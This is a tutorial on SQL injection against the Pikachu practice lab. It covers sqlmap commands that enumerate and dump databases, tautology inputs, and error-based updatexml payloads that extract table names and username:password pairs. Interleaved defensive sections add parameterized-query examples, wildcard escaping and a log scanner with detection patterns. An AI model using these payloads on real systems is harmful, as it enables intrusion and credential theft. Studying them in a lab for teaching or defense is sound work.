
Title: sqlmap injection series (advanced article)

Foreword:

Software: Burp and sqlmap configuration

Set the proxy

Open the Firefox browser that ships with Kali, then click Settings -> Network Settings.

Vulnerable environment installation

Numeric injection (POST)

Use Burp to capture the request and save the captured request to a file, 33.txt.

Enumerate the databases

sqlmap -r '/root/22.txt' --dbs

Enumerate the tables

sqlmap -r '22.txt' -D lou --tables

Enumerate the table columns

sqlmap -r '22.txt' -D lou -T users --columns

Dump the table data

sqlmap -r '/root/33.txt' -D kalibc -T users -C 'username,password' --dump


Character injection

Open the character-injection page in Pikachu.

The principle of character-type injection is that 'false' or true#' always evaluates to true: the injected quote closes the string literal, or true makes the condition true, and # comments out the original trailing quote.

Connect to the database and enter select id,email from member where id='KOBE'

This outputs the email of the KOBE account.

So, if we enter a string in the input box that is spliced into the SQL as-is, can we make the query return every row?

We enter kali' or 1=1# in the input box (the single quote is spliced onto the original SQL and closes its string literal; everything after # is commented out, including the original trailing quote).
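The splicing just described, as an added example that is not part of the original article: the vulnerable lookup concatenates the input into the SQL text, while the hardened lookup binds it as a parameter so the SQL text never changes. It uses Python's sqlite3 in place of the lab's MySQL (an assumption so it runs offline); sqlite's line comment is -- rather than MySQL's #, so the tautology is written kali' or 1=1--. The member rows are constructed.

```python
import sqlite3

# Constructed stand-in for the lab's member table. Assumption: sqlite3 is used
# instead of MySQL so the example runs without a server; sqlite's line comment
# is "--" where MySQL also accepts "#".
MEMBERS = [
    ("KOBE", "kobe@example.com"),
    ("vince", "vince@example.com"),
    ("allen", "allen@example.com"),
]


def make_db():
    """Create an in-memory member(id, email) table with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE member (id TEXT, email TEXT)")
    conn.executemany("INSERT INTO member VALUES (?, ?)", MEMBERS)
    return conn


def lookup_spliced(conn, user_input):
    """Vulnerable form: the input is spliced into the SQL text, so a quote in
    the input ends the literal and whatever follows is parsed as SQL."""
    sql = "SELECT id, email FROM member WHERE id='%s'" % user_input
    return sql, conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_input):
    """Hardened form: the input is bound as a parameter. The SQL text is fixed,
    so a quote or comment marker in the input is treated as plain data."""
    sql = "SELECT id, email FROM member WHERE id=?"
    return sql, conn.execute(sql, (user_input,)).fetchall()


def demo():
    """Run a normal lookup and the tautology input through both forms and
    return the rows each produced, keyed by (form, input label)."""
    conn = make_db()
    tautology = "kali' or 1=1--"   # sqlite spelling of the article's kali' or 1=1#
    results = {}
    for label, value in (("normal", "KOBE"), ("tautology", tautology)):
        sql, rows = lookup_spliced(conn, value)
        results[("spliced", label)] = rows
        print("spliced       %-10s -> %s\n    %s" % (label, rows, sql))
        sql, rows = lookup_parameterized(conn, value)
        results[("parameterized", label)] = rows
        print("parameterized %-10s -> %s" % (label, rows))
    return results


if __name__ == "__main__":
    demo()
```

The spliced query for the tautology input reads WHERE id='kali' or 1=1--' and returns all three rows; the parameterized query looks for an id literally equal to that string and returns nothing, which is the property a fix has to preserve whatever the input contains.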

sqlmap injection (search type)

Verify whether there is injection

We enter a single character, k, and click Search.

No exception is seen.

We enter the keyword %k%

The effect is as follows:

[screenshot: result of searching for %k%]

At this point, we can conclude that there is a search-type injection vulnerability.

Attack method one

Use Burp to capture the request and save it as 22.txt

Put 22.txt in the sqlmap root directory, /usr/share/sqlmap

Enumerate the databases

sqlmap -r '22.txt' --dbs

Method 2

There is no need to capture and save the request; run the command directly:

sqlmap -u http://192.168.123.129/vul/sqli/sqli_search.php? --data 'name=*&submit=%E6%90%9C%E7%B4%A2' --dbs

Analysis: the SQL fuzzy-match query is select * from <table name> where <column name> like '%<value>%'. Following the earlier idea, a universal (always-true) statement can again be spliced in.

Written out, the spliced statement becomes '%xxxx%' or 1=1 #%'. Go back to the Pikachu platform and try it.
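The LIKE splicing and its fix, as an added example that is not from the article: parameters stop a quote in the keyword from escaping the literal, but % and _ typed by the user still act as LIKE wildcards and widen the match, so the third variant escapes them and declares the escape character with ESCAPE. As before, sqlite3 stands in for MySQL (an assumption; its line comment is -- rather than #) and the usernames are constructed.

```python
import sqlite3

# Constructed usernames standing in for the lab's search target. Assumption:
# sqlite3 replaces MySQL so the example runs offline.
USERNAMES = ["kobe", "allen", "kali", "vince"]


def make_db():
    """In-memory member(username) table filled with the constructed names."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE member (username TEXT)")
    conn.executemany("INSERT INTO member VALUES (?)", [(u,) for u in USERNAMES])
    return conn


def search_spliced(conn, keyword):
    """Vulnerable: the keyword is spliced into LIKE '%...%', so a quote in the
    keyword closes the literal and a tautology can follow it."""
    sql = "SELECT username FROM member WHERE username LIKE '%%%s%%'" % keyword
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn, keyword):
    """Parameterized: no injection is possible, but % and _ typed by the user
    are still wildcards, so the keyword "%" alone matches every row."""
    sql = "SELECT username FROM member WHERE username LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + keyword + "%",))]


def search_escaped(conn, keyword):
    """Parameterized and wildcard-safe: escape backslash, % and _ inside the
    keyword and tell LIKE which escape character was used, so the user's
    characters are matched literally."""
    esc = keyword.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT username FROM member WHERE username LIKE ? ESCAPE '\\'"
    return [row[0] for row in conn.execute(sql, ("%" + esc + "%",))]


if __name__ == "__main__":
    db = make_db()
    payload = "k%' or 1=1--"   # sqlite spelling of the article's xxxx%' or 1=1 #
    print("spliced, k        :", search_spliced(db, "k"))
    print("spliced, payload  :", search_spliced(db, payload))
    print("param, payload    :", search_parameterized(db, payload))
    print("param, %          :", search_parameterized(db, "%"))
    print("escaped, %k%      :", search_escaped(db, "%k%"))
    print("escaped, k        :", search_escaped(db, "k"))
```

The escaped variant is the one to copy: a search for %k% then matches only names that literally contain %k%, and a bare % no longer enumerates the whole table.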

xx-type injection

The xx type differs only in how the SQL is spliced, so the result is given directly: xx') or 1=1#

SQL update/insert/delete injection

About the update and insert statements

update: the database update statement

insert: the database insert statement

First open the registration page.

Fill in the data, click Submit and capture the request.

Right-click, choose Send to Repeater, and change the value of the username field to kali' or updatexml(1,concat(0x7e,database()),0) or'

Click Go and the database name is revealed directly.

That is, the modified request body should be: username=kali' or updatexml(1,concat(0x7e,database()),0) or'&password=123456&sex=&phonenum=185673951111&email=&add=&submit=submit

Get the table name

The username value is ' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='new' limit 0,1)),0) or'

username=' or updatexml(2,concat(0x7e,(select table_name from information_schema.tables where table_schema='new' limit 3,1)),0) or'&password=123456&sex=&phonenum=185673951111&email=&add=&submit=submit

Get the columns

kali' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 2,1)),0) or'

Get the content

username=kali' or updatexml(1,concat(0x7e,(select concat_ws(':', username, password) from users limit 0,1)),0) or'&password=123456&sex=&phonenum=185673951111&email=&add=&submit=submit

update injection

Log in first.

Click Modify and capture the request.

Enumerate the database

kali'or updatexml(2,concat(0x7e,(database())),0) or'

For other purposes, refer to the syntax given above.

delete injection

Leave a message first.

Then find the delete link.

Enumerate the database version

or updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)

Execute http://127.0.0.1:8888/vul/sqli/sqli_del.php?id=56%20or%20updatexml(1,concat(0x7e,(SELECT%20@@version),0x7e),1)

The version is obtained successfully. The remaining payloads follow the same pattern:

Database: or updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)

Table: or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='lou' limit 0,1)),0) or ''

Column name: or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1)),0) or ''

HTTP Header Injection

Sometimes back-end developers verify client header information (cookie verification is common), or take information from HTTP header fields such as User-Agent and Accept. The client's HTTP header values are then read and processed with SQL. If security is not sufficiently considered at that point, this can result in a SQL injection vulnerability based on HTTP headers.
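From the defender's side, the error-based updatexml payloads of the update/insert/delete sections above and the header-based variant described here leave recognisable traces in request logs. The following added example (not from the article) scans a constructed access log, URL-decodes the path, User-Agent and Cookie fields, and flags the payload shapes shown in this article. The log format, the sample lines and the rule set are assumptions made for the example.

```python
import re
from urllib.parse import unquote_plus

# Rules derived from the payload shapes shown in this article. Assumption:
# illustrative regexes only, not a complete WAF or IDS rule set.
RULES = {
    "error_based_updatexml": re.compile(r"updatexml\s*\(", re.I),
    "schema_enumeration": re.compile(r"information_schema\s*\.\s*(tables|columns)", re.I),
    "tautology": re.compile(r"\bor\s+\d+\s*=\s*\d+", re.I),
}

# Constructed log format: client, ident, user, [time], "request line", status,
# "User-Agent", "Cookie". Assumption: Apache combined layout plus a cookie field.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) '
    r'"(?P<user_agent>[^"]*)" "(?P<cookie>[^"]*)"$'
)


def parse_log_line(line):
    """Split one log line into named fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_fields(fields):
    """Return (field, rule) pairs for every rule that fires on a field. Fields
    are URL-decoded first so %20-encoded payloads are inspected in clear."""
    findings = []
    for field in ("path", "user_agent", "cookie"):
        decoded = unquote_plus(fields[field])
        for name, rx in RULES.items():
            if rx.search(decoded):
                findings.append((field, name))
    return findings


def scan_log(lines):
    """Scan every parseable line and return one alert per line with findings."""
    alerts = []
    for line in lines:
        fields = parse_log_line(line)
        if fields is None:
            continue
        hits = scan_fields(fields)
        if hits:
            alerts.append({"client": fields["client"], "time": fields["time"],
                           "path": fields["path"], "hits": hits})
    return alerts


# Constructed sample lines modelled on the requests in this article: the GET
# delete-injection URL, a benign search, an injected User-Agent, an injected
# cookie, and the table-enumeration variant of the delete injection.
SAMPLE_LOG = [
    "192.168.123.1 - - [04/Apr/2019:11:07:11 +0800] \"GET /vul/sqli/sqli_del.php?id=56%20or%20updatexml(1,concat(0x7e,(SELECT%20@@version),0x7e),1) HTTP/1.1\" 200 \"Mozilla/5.0\" \"PHPSESSID=s1\"",
    "192.168.123.1 - - [04/Apr/2019:11:08:02 +0800] \"GET /vul/sqli/sqli_search.php?name=k&submit=search HTTP/1.1\" 200 \"Mozilla/5.0\" \"PHPSESSID=s1\"",
    "192.168.123.1 - - [04/Apr/2019:11:09:40 +0800] \"GET /index.php HTTP/1.1\" 500 \"Mozilla/5.0' or updatexml(1,concat(0x7e,database()),0) or'\" \"PHPSESSID=s1\"",
    "192.168.123.1 - - [04/Apr/2019:11:10:15 +0800] \"GET /index.php HTTP/1.1\" 200 \"Mozilla/5.0\" \"PHPSESSID=s1; user=admin' or 1=1#\"",
    "192.168.123.1 - - [04/Apr/2019:11:12:03 +0800] \"GET /vul/sqli/sqli_del.php?id=56%20or%20updatexml(1,concat(0x7e,(select%20table_name%20from%20information_schema.tables%20where%20table_schema='lou'%20limit%200,1)),0) HTTP/1.1\" 500 \"Mozilla/5.0\" \"PHPSESSID=s1\"",
]


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["time"], alert["client"], alert["path"], alert["hits"])
```

Two caveats when adopting this: request bodies (the POST payloads of the insert and update sections) are not in a standard access log, so the same scan has to run on a source that records them, and a single unquote_plus pass does not undo double encoding. The detection is a backstop; the actual fix for every variant on this page is the same parameterized query shown earlier, applied to header and cookie values exactly as to form fields, together with not returning database error text to the client, since updatexml only works because the error message is displayed.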
